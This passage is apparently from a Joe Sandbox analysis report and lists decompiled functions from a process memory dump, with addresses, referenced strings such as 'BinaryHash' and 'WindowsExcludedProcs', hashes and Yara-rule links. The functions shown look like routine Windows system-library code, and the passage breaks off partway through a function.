Instruction Fuzzy Hash: 5151E3712043429FEB25DF29E884F1BB7E5EBC4304F040A2EF9968B290D771E905CB62

Uniqueness

Uniqueness Score: -1.00%

Function 036FF0BF Relevance: 1.4, Strings: 1, Instructions: 137
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E036FF0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char* _v20;
				intOrPtr _v24;
				char _v28;
				intOrPtr _v32;
				char _v36;
				char _v44;
				char _v52;
				intOrPtr _v56;
				char _v60;
				intOrPtr _v72;
				void* _t51;
				void* _t58;
				signed short _t82;
				short _t84;
				signed int _t91;
				signed int _t100;
				signed short* _t103;
				void* _t108;
				intOrPtr* _t109;

				_t103 = __ecx;
				_t82 = __edx;
				_t51 = E036E4120(0, __ecx, 0,  &_v52, 0, 0, 0);
				if(_t51 >= 0) {
					_push(0x21);
					_push(3);
					_v56 =  *0x7ffe02dc;
					_v20 =  &_v52;
					_push( &_v44);
					_v28 = 0x18;
					_push( &_v28);
					_push(0x100020);
					_v24 = 0;
					_push( &_v60);
					_v16 = 0x40;
					_v12 = 0;
					_v8 = 0;
					_t58 = E03709830();
					_t87 =  *[fs:0x30];
					_t108 = _t58;
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
					if(_t108 < 0) {
						L11:
						_t51 = _t108;
					} else {
						_push(4);
						_push(8);
						_push( &_v36);
						_push( &_v44);
						_push(_v60);
						_t108 = E03709990();
						if(_t108 < 0) {
							L10:
							_push(_v60);
							E037095D0();
							goto L11;
						} else {
							_t109 = L036E4620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
							if(_t109 == 0) {
								_t108 = 0xc0000017;
								goto L10;
							} else {
								_t21 = _t109 + 0x18; // 0x18
								 *((intOrPtr*)(_t109 + 4)) = _v60;
								 *_t109 = 1;
								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
								 *(_t109 + 0xe) = _t82;
								 *((intOrPtr*)(_t109 + 8)) = _v56;
								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
								E0370F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
								 *((short*)(_t109 + 0xc)) =  *_t103;
								_t91 =  *_t103 & 0x0000ffff;
								_t100 = _t91 & 0xfffffffe;
								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E037095D0();
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

0x036ff0d3
0x036ff0d9
0x036ff0e0
0x036ff0e7
0x036ff0f2
0x036ff0f4
0x036ff0f8
0x036ff100
0x036ff108
0x036ff10d
0x036ff115
0x036ff116
0x036ff11f
0x036ff123
0x036ff124
0x036ff12c
0x036ff130
0x036ff134
0x036ff13d
0x036ff144
0x036ff14b
0x036ff152
0x0373bab0
0x0373bab0
0x036ff158
0x036ff158
0x036ff15a
0x036ff160
0x036ff165
0x036ff166
0x036ff16f
0x036ff173
0x0373baa7
0x0373baa7
0x0373baab
0x00000000
0x036ff179
0x036ff18d
0x036ff191
0x0373baa2
0x00000000
0x036ff197
0x036ff19b
0x036ff1a2
0x036ff1a9
0x036ff1af
0x036ff1b2
0x036ff1b6
0x036ff1b9
0x036ff1c4
0x036ff1d8
0x036ff1df
0x036ff1e3
0x036ff1eb
0x036ff1ee
0x036ff1f4
0x036ff20f
0x0373bab7
0x0373babb
0x0373bacc
0x0373bad1
0x036ff215
0x036ff218
0x036ff226
0x036ff22b
0x00000000
0x036ff22b
0x036ff1f6
0x036ff1f6
0x036ff1f9
0x036ff1fb
0x036ff1fb
0x036ff1f4
0x036ff191
0x036ff173
0x036ff152
0x036ff203

Strings

@, xrefs: 036FF124

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction ID: 4631d2ccfc3fa814855057c466389fa66da59208f3d0e238aa20202ec27205a0
Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
Instruction Fuzzy Hash: 72518C75505710AFC321DF69C840A6BBBF8FF48710F00892EFA958B6A0E7B4E914CB91

Uniqueness

Uniqueness Score: -1.00%

Function 03743540 Relevance: 1.4, Strings: 1, Instructions: 130
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E03743540(intOrPtr _a4) {
				signed int _v12;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				char _v352;
				char _v1072;
				intOrPtr _v1140;
				intOrPtr _v1148;
				char _v1152;
				char _v1156;
				char _v1160;
				char _v1164;
				char _v1168;
				char* _v1172;
				short _v1174;
				char _v1176;
				char _v1180;
				char _v1192;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				short _t41;
				short _t42;
				intOrPtr _t80;
				intOrPtr _t81;
				signed int _t82;
				void* _t83;

				_v12 =  *0x37bd360 ^ _t82;
				_t41 = 0x14;
				_v1176 = _t41;
				_t42 = 0x16;
				_v1174 = _t42;
				_v1164 = 0x100;
				_v1172 = L"BinaryHash";
				_t81 = E03700BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
				if(_t81 < 0) {
					L11:
					_t75 = _t81;
					E03743706(0, _t81, _t79, _t80);
					L12:
					if(_a4 != 0xc000047f) {
						E0370FA60( &_v1152, 0, 0x50);
						_v1152 = 0x60c201e;
						_v1148 = 1;
						_v1140 = E03743540;
						E0370FA60( &_v1072, 0, 0x2cc);
						_push( &_v1072);
						E0371DDD0( &_v1072, _t75, _t79, _t80, _t81);
						E03750C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
						_push(_v1152);
						_push(0xffffffff);
						E037097C0();
					}
					return E0370B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
				}
				_t79 =  &_v352;
				_t81 = E03743971(0, _a4,  &_v352,  &_v1156);
				if(_t81 < 0) {
					goto L11;
				}
				_t75 = _v1156;
				_t79 =  &_v1160;
				_t81 = E03743884(_v1156,  &_v1160,  &_v1168);
				if(_t81 >= 0) {
					_t80 = _v1160;
					E0370FA60( &_v96, 0, 0x50);
					_t83 = _t83 + 0xc;
					_push( &_v1180);
					_push(0x50);
					_push( &_v96);
					_push(2);
					_push( &_v1176);
					_push(_v1156);
					_t81 = E03709650();
					if(_t81 >= 0) {
						if(_v92 != 3 || _v88 == 0) {
							_t81 = 0xc000090b;
						}
						if(_t81 >= 0) {
							_t75 = _a4;
							_t79 =  &_v352;
							E03743787(_a4,  &_v352, _t80);
						}
					}
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
				}
				_push(_v1156);
				E037095D0();
				if(_t81 >= 0) {
					goto L12;
				} else {
					goto L11;
				}
			}

0x03743552
0x0374355a
0x0374355d
0x03743566
0x03743567
0x0374357e
0x0374358f
0x037435a1
0x037435a5
0x0374366b
0x0374366b
0x0374366d
0x03743672
0x03743679
0x03743685
0x0374368d
0x0374369d
0x037436a7
0x037436b8
0x037436c6
0x037436c7
0x037436dc
0x037436e1
0x037436e7
0x037436e9
0x037436e9
0x03743703
0x03743703
0x037435b5
0x037435c0
0x037435c4
0x00000000
0x00000000
0x037435ca
0x037435d7
0x037435e2
0x037435e6
0x037435e8
0x037435f5
0x037435fa
0x03743603
0x03743604
0x03743609
0x0374360a
0x03743612
0x03743613
0x0374361e
0x03743622
0x03743628
0x0374362f
0x0374362f
0x03743636
0x03743638
0x0374363b
0x03743642
0x03743642
0x03743636
0x03743657
0x03743657
0x0374365c
0x03743662
0x03743669
0x00000000
0x00000000
0x00000000
0x00000000

Strings

BinaryHash, xrefs: 0374358F

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: BinaryHash
API String ID: 0-2202222882
Opcode ID: 961336a6fb61301a78120db84a24245a95b8953a619163ff89ebe3298f0c6567
Instruction ID: 1e1c0114d7ab77c99b336e46e95f3a8143650246d291eb88adaf5b14e51f1713
Opcode Fuzzy Hash: 961336a6fb61301a78120db84a24245a95b8953a619163ff89ebe3298f0c6567
Instruction Fuzzy Hash: D94146F5D0062D9BEB21DA50CC84FDEB77CAB44714F0045A5EA09AB280DB30AE988F95

Uniqueness

Uniqueness Score: -1.00%

Function 037905AC Relevance: 1.4, Strings: 1, Instructions: 115
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E037905AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				signed int _v20;
				char _v24;
				signed int _v28;
				char _v32;
				signed int _v36;
				intOrPtr _v40;
				void* __ebx;
				void* _t35;
				signed int _t42;
				char* _t48;
				signed int _t59;
				signed char _t61;
				signed int* _t79;
				void* _t88;

				_v28 = __edx;
				_t79 = __ecx;
				if(E037907DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
					L13:
					_t35 = 0;
					L14:
					return _t35;
				}
				_t61 = __ecx[1];
				_t59 = __ecx[0xf];
				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
				_v36 = _a8 << 0xc;
				_t42 =  *(_t59 + 0xc) & 0x40000000;
				asm("sbb esi, esi");
				_t88 = ( ~_t42 & 0x0000003c) + 4;
				if(_t42 != 0) {
					_push(0);
					_push(0x14);
					_push( &_v24);
					_push(3);
					_push(_t59);
					_push(0xffffffff);
					if(E03709730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
						_push(_t61);
						E0378A80D(_t59, 1, _v20, 0);
						_t88 = 4;
					}
				}
				_t35 = E0378A854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
				if(_t35 < 0) {
					goto L14;
				}
				E03791293(_t79, _v40, E037907DF(_t79, _v28,  &_a4,  &_a8, 1));
				if(E036E7D50() == 0) {
					_t48 = 0x7ffe0380;
				} else {
					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
					E0378138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
				}
				goto L13;
			}

0x037905c5
0x037905ca
0x037905d3
0x037906db
0x037906db
0x037906dd
0x037906e3
0x037906e3
0x037905dd
0x037905e7
0x037905f6
0x03790600
0x03790607
0x03790610
0x03790615
0x0379061a
0x0379061c
0x0379061e
0x03790624
0x03790625
0x03790627
0x03790628
0x03790631
0x03790640
0x0379064d
0x03790654
0x03790654
0x03790631
0x0379066d
0x03790674
0x00000000
0x00000000
0x03790692
0x0379069e
0x037906b0
0x037906a0
0x037906a9
0x037906a9
0x037906b8
0x037906d6
0x037906d6
0x00000000

Strings

`, xrefs: 03790633

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: `
API String ID: 0-2679148245
Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction ID: 88a6c6b96d823ffed1e8aeb031bcba054fdf144b360faa18b7f9e0de18c8347d
Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
Instruction Fuzzy Hash: 8331E032204305ABEB20DF24DD84F9AB7D9ABC4754F08422AFA58DB280D770E914CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 03743884 Relevance: 1.3, Strings: 1, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E03743884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				char* _v20;
				short _v22;
				char _v24;
				intOrPtr _t38;
				short _t40;
				short _t41;
				void* _t44;
				intOrPtr _t47;
				void* _t48;

				_v16 = __edx;
				_t40 = 0x14;
				_v24 = _t40;
				_t41 = 0x16;
				_v22 = _t41;
				_t38 = 0;
				_v12 = __ecx;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(2);
				_t43 =  &_v24;
				_v20 = L"BinaryName";
				_push( &_v24);
				_push(__ecx);
				_t47 = 0;
				_t48 = E03709650();
				if(_t48 >= 0) {
					_t48 = 0xc000090b;
				}
				if(_t48 != 0xc0000023) {
					_t44 = 0;
					L13:
					if(_t48 < 0) {
						L16:
						if(_t47 != 0) {
							L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
						}
						L18:
						return _t48;
					}
					 *_v16 = _t38;
					 *_a4 = _t47;
					goto L18;
				}
				_t47 = L036E4620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
				if(_t47 != 0) {
					_push( &_v8);
					_push(_v8);
					_push(_t47);
					_push(2);
					_push( &_v24);
					_push(_v12);
					_t48 = E03709650();
					if(_t48 < 0) {
						_t44 = 0;
						goto L16;
					}
					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
						_t48 = 0xc000090b;
					}
					_t44 = 0;
					if(_t48 < 0) {
						goto L16;
					} else {
						_t17 = _t47 + 0xc; // 0xc
						_t38 = _t17;
						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
							_t48 = 0xc000090b;
						}
						goto L13;
					}
				}
				_t48 = _t48 + 0xfffffff4;
				goto L18;
			}

0x03743893
0x03743896
0x03743899
0x0374389f
0x037438a0
0x037438a4
0x037438a9
0x037438ac
0x037438ad
0x037438ae
0x037438af
0x037438b1
0x037438b4
0x037438bb
0x037438bc
0x037438bd
0x037438c4
0x037438c8
0x037438ca
0x037438ca
0x037438d5
0x0374393e
0x03743940
0x03743942
0x03743952
0x03743954
0x03743961
0x03743961
0x03743967
0x0374396e
0x0374396e
0x03743947
0x0374394c
0x00000000
0x0374394c
0x037438ea
0x037438ee
0x037438f8
0x037438f9
0x037438ff
0x03743900
0x03743902
0x03743903
0x0374390b
0x0374390f
0x03743950
0x00000000
0x03743950
0x03743915
0x0374391d
0x0374391d
0x03743922
0x03743926
0x00000000
0x03743928
0x0374392b
0x0374392b
0x03743935
0x03743937
0x03743937
0x00000000
0x03743935
0x03743926
0x037438f0
0x00000000

Strings

BinaryName, xrefs: 037438B4

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 9e9d0b987b18f40488bba7cddc7183e11af5e535209e1fe9cada2c6ed23cc7f9
Instruction ID: 417eab5658000e6817915aab77411df75ee52cab6ac14457510ecc2e71de4e6e
Opcode Fuzzy Hash: 9e9d0b987b18f40488bba7cddc7183e11af5e535209e1fe9cada2c6ed23cc7f9
Instruction Fuzzy Hash: 2031273AD01609BFFB15DA58C945E7FF778EB40724F054169E908AB290D730EE10D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 036FD294 Relevance: 1.3, Strings: 1, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 33%

			E036FD294(void* __ecx, char __edx, void* __eflags) {
				signed int _v8;
				char _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr _v64;
				char* _v68;
				intOrPtr _v72;
				char _v76;
				signed int _v84;
				intOrPtr _v88;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				char _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				char _t38;
				signed int _t40;
				signed int _t44;
				signed int _t52;
				void* _t53;
				void* _t55;
				void* _t61;
				intOrPtr _t62;
				void* _t64;
				signed int _t65;
				signed int _t66;

				_t68 = (_t66 & 0xfffffff8) - 0x6c;
				_v8 =  *0x37bd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
				_v105 = __edx;
				_push( &_v92);
				_t52 = 0;
				_push(0);
				_push(0);
				_push( &_v104);
				_push(0);
				_t59 = __ecx;
				_t55 = 2;
				if(E036E4120(_t55, __ecx) < 0) {
					_t35 = 0;
					L8:
					_pop(_t61);
					_pop(_t64);
					_pop(_t53);
					return E0370B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
				}
				_v96 = _v100;
				_t38 = _v92;
				if(_t38 != 0) {
					_v104 = _t38;
					_v100 = _v88;
					_t40 = _v84;
				} else {
					_t40 = 0;
				}
				_v72 = _t40;
				_v68 =  &_v104;
				_push( &_v52);
				_v76 = 0x18;
				_push( &_v76);
				_v64 = 0x40;
				_v60 = _t52;
				_v56 = _t52;
				_t44 = E037098D0();
				_t62 = _v88;
				_t65 = _t44;
				if(_t62 != 0) {
					asm("lock xadd [edi], eax");
					if((_t44 | 0xffffffff) != 0) {
						goto L4;
					}
					_push( *((intOrPtr*)(_t62 + 4)));
					E037095D0();
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
					goto L4;
				} else {
					L4:
					L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
					if(_t65 >= 0) {
						_t52 = 1;
					} else {
						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
						}
					}
					_t35 = _t52;
					goto L8;
				}
			}

0x036fd29c
0x036fd2a6
0x036fd2b1
0x036fd2b5
0x036fd2b6
0x036fd2bc
0x036fd2bd
0x036fd2be
0x036fd2bf
0x036fd2c2
0x036fd2c4
0x036fd2cc
0x036fd384
0x036fd34b
0x036fd34f
0x036fd350
0x036fd351
0x036fd35c
0x036fd35c
0x036fd2d6
0x036fd2da
0x036fd2e1
0x036fd361
0x036fd369
0x036fd36d
0x036fd2e3
0x036fd2e3
0x036fd2e3
0x036fd2e5
0x036fd2ed
0x036fd2f5
0x036fd2fa
0x036fd302
0x036fd303
0x036fd30b
0x036fd30f
0x036fd313
0x036fd318
0x036fd31c
0x036fd320
0x036fd379
0x036fd37d
0x00000000
0x00000000
0x0373affe
0x0373b001
0x0373b011
0x00000000
0x036fd322
0x036fd322
0x036fd330
0x036fd337
0x036fd35d
0x036fd339
0x036fd33f
0x036fd38c
0x036fd38c
0x036fd33f
0x036fd349
0x00000000
0x036fd349

Strings

@, xrefs: 036FD303

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 603aae4b6cffe82aa09384f4a8b6fc8bb1cd1046a082e381f0e7d7c0df8e92aa
Instruction ID: 6162aa3354840ed32baed95ed0dc29673a79321cf65b803f725e00b175655082
Opcode Fuzzy Hash: 603aae4b6cffe82aa09384f4a8b6fc8bb1cd1046a082e381f0e7d7c0df8e92aa
Instruction Fuzzy Hash: CB3191B6509305DFC721DF28C984A6BBBE8FB86654F04092EFB94C7250D635ED09CB92

Uniqueness

Uniqueness Score: -1.00%

Function 036D1B8F Relevance: 1.3, Strings: 1, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E036D1B8F(void* __ecx, intOrPtr __edx, intOrPtr* _a4, signed int* _a8) {
				intOrPtr _v8;
				char _v16;
				intOrPtr* _t26;
				intOrPtr _t29;
				void* _t30;
				signed int _t31;

				_t27 = __ecx;
				_t29 = __edx;
				_t31 = 0;
				_v8 = __edx;
				if(__edx == 0) {
					L18:
					_t30 = 0xc000000d;
					goto L12;
				} else {
					_t26 = _a4;
					if(_t26 == 0 || _a8 == 0 || __ecx == 0) {
						goto L18;
					} else {
						E0370BB40(__ecx,  &_v16, __ecx);
						_push(_t26);
						_push(0);
						_push(0);
						_push(_t29);
						_push( &_v16);
						_t30 = E0370A9B0();
						if(_t30 >= 0) {
							_t19 =  *_t26;
							if( *_t26 != 0) {
								goto L7;
							} else {
								 *_a8 =  *_a8 & 0;
							}
						} else {
							if(_t30 != 0xc0000023) {
								L9:
								_push(_t26);
								_push( *_t26);
								_push(_t31);
								_push(_v8);
								_push( &_v16);
								_t30 = E0370A9B0();
								if(_t30 < 0) {
									L12:
									if(_t31 != 0) {
										L036E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t31);
									}
								} else {
									 *_a8 = _t31;
								}
							} else {
								_t19 =  *_t26;
								if( *_t26 == 0) {
									_t31 = 0;
								} else {
									L7:
									_t31 = L036E4620(_t27,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t19);
								}
								if(_t31 == 0) {
									_t30 = 0xc0000017;
								} else {
									goto L9;
								}
							}
						}
					}
				}
				return _t30;
			}

0x036d1b8f
0x036d1b9a
0x036d1b9c
0x036d1b9e
0x036d1ba3
0x03727010
0x03727010
0x00000000
0x036d1ba9
0x036d1ba9
0x036d1bae
0x00000000
0x036d1bc5
0x036d1bca
0x036d1bcf
0x036d1bd0
0x036d1bd1
0x036d1bd2
0x036d1bd6
0x036d1bdc
0x036d1be0
0x03726ffc
0x03727000
0x00000000
0x03727006
0x03727009
0x03727009
0x036d1be6
0x036d1bec
0x036d1c0b
0x036d1c0b
0x036d1c0c
0x036d1c11
0x036d1c12
0x036d1c15
0x036d1c1b
0x036d1c1f
0x036d1c31
0x036d1c33
0x03727026
0x03727026
0x036d1c21
0x036d1c24
0x036d1c24
0x036d1bee
0x036d1bee
0x036d1bf2
0x036d1c3a
0x036d1bf4
0x036d1bf4
0x036d1c05
0x036d1c05
0x036d1c09
0x036d1c3e
0x00000000
0x00000000
0x00000000
0x036d1c09
0x036d1bec
0x036d1be0
0x036d1bae
0x036d1c2e

Strings

WindowsExcludedProcs, xrefs: 036D1BC5

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: WindowsExcludedProcs
API String ID: 0-3583428290
Opcode ID: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction ID: 2a1dc75a212a9847a9cbf326cfbf39dc399d7e053b10c9c068962b026a027a1c
Opcode Fuzzy Hash: 1bf07565f9293903005a3f3a42acb8b910e30ddc7b9aa6256cfa4b1325e2faca
Instruction Fuzzy Hash: CA21D776A01228ABCB71DB55CA44F5BBBADEF43650F094465FD049B200D674DD05D7A0

Uniqueness

Uniqueness Score: -1.00%

Function 036EF716 Relevance: 1.3, Strings: 1, Instructions: 71
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E036EF716(signed int __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				intOrPtr _t13;
				intOrPtr _t14;
				signed int _t16;
				signed char _t17;
				intOrPtr _t19;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr* _t25;

				_t25 = _a8;
				_t17 = __ecx;
				if(_t25 == 0) {
					_t19 = 0xc00000f2;
					L8:
					return _t19;
				}
				if((__ecx & 0xfffffffe) != 0) {
					_t19 = 0xc00000ef;
					goto L8;
				}
				_t19 = 0;
				 *_t25 = 0;
				_t21 = 0;
				_t23 = "Actx ";
				if(__edx != 0) {
					if(__edx == 0xfffffffc) {
						L21:
						_t21 = 0x200;
						L5:
						_t13 =  *((intOrPtr*)( *[fs:0x30] + _t21));
						 *_t25 = _t13;
						L6:
						if(_t13 == 0) {
							if((_t17 & 0x00000001) != 0) {
								 *_t25 = _t23;
							}
						}
						L7:
						goto L8;
					}
					if(__edx == 0xfffffffd) {
						 *_t25 = _t23;
						_t13 = _t23;
						goto L6;
					}
					_t13 =  *((intOrPtr*)(__edx + 0x10));
					 *_t25 = _t13;
					L14:
					if(_t21 == 0) {
						goto L6;
					}
					goto L5;
				}
				_t14 = _a4;
				if(_t14 != 0) {
					_t16 =  *(_t14 + 0x14) & 0x00000007;
					if(_t16 <= 1) {
						_t21 = 0x1f8;
						_t13 = 0;
						goto L14;
					}
					if(_t16 == 2) {
						goto L21;
					}
					if(_t16 != 4) {
						_t19 = 0xc00000f0;
						goto L7;
					}
					_t13 = 0;
					goto L6;
				} else {
					_t21 = 0x1f8;
					goto L5;
				}
			}

0x036ef71d
0x036ef722
0x036ef726
0x03734770
0x036ef765
0x036ef769
0x036ef769
0x036ef732
0x0373477a
0x00000000
0x0373477a
0x036ef738
0x036ef73a
0x036ef73c
0x036ef73f
0x036ef746
0x036ef778
0x036ef7a9
0x036ef7a9
0x036ef754
0x036ef75a
0x036ef75d
0x036ef75f
0x036ef761
0x036ef76f
0x036ef771
0x036ef771
0x036ef76f
0x036ef763
0x00000000
0x036ef763
0x036ef77d
0x036ef7a3
0x036ef7a5
0x00000000
0x036ef7a5
0x036ef77f
0x036ef782
0x036ef784
0x036ef786
0x00000000
0x00000000
0x00000000
0x036ef788
0x036ef748
0x036ef74d
0x036ef78d
0x036ef793
0x036ef7b7
0x036ef7bc
0x00000000
0x036ef7bc
0x036ef798
0x00000000
0x00000000
0x036ef79d
0x036ef7b0
0x00000000
0x036ef7b0
0x036ef79f
0x00000000
0x036ef74f
0x036ef74f
0x00000000
0x036ef74f

Strings

Actx , xrefs: 036EF73F

Memory Dump Source

Source File: 00000005.00000002.480396145.00000000036A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 036A0000, based on PE: true

Associated: 00000005.00000002.482855504.00000000037BB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.483011341.00000000037BF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_36a0000_cmd.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 005f06dd2c54b52a5b8bd5da7bdc2364531742522e87457cc423add977ef0e9c
Instruction ID: 2de2f0bd491fd3ec92b60c9b5f1303f800455c61878a23b72cc5de3de2751051
Opcode Fuzzy Hash: 005f06dd2c54b52a5b8bd5da7bdc2364531742522e87457cc423add977ef0e9c
Instruction Fuzzy Hash: 9F11E9343166028BEF24CD1DA658735B2D9EB86214F2B452EE861CF391D770C849A340

Uniqueness

Uniqueness Score: -1.00%

Function 03778DF1 Relevance: 1.3, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 71%

			E03778DF1(void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t35;
				void* _t41;

				_t40 = __esi;
				_t39 = __edi;
				_t38 = __edx;
				_t35 = __ecx;
				_t34 = __ebx;
				_push(0x74);
				_push(0x37a0d50);
				E0371D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t41 - 0x7c)) = __edx;
				 *((intOrPtr*)(_t41 - 0x74)) = __ecx;
				if( *((intOrPtr*)( *[fs:0x30] + 2)) != 0 || ( *0x7ffe02d4 & 0 | ( *0x7ffe02d4 & 0x00000003) == 0x00000003) != 0) {
					E03755720(0x65, 0, "Critical error detected %lx\n", _t35);
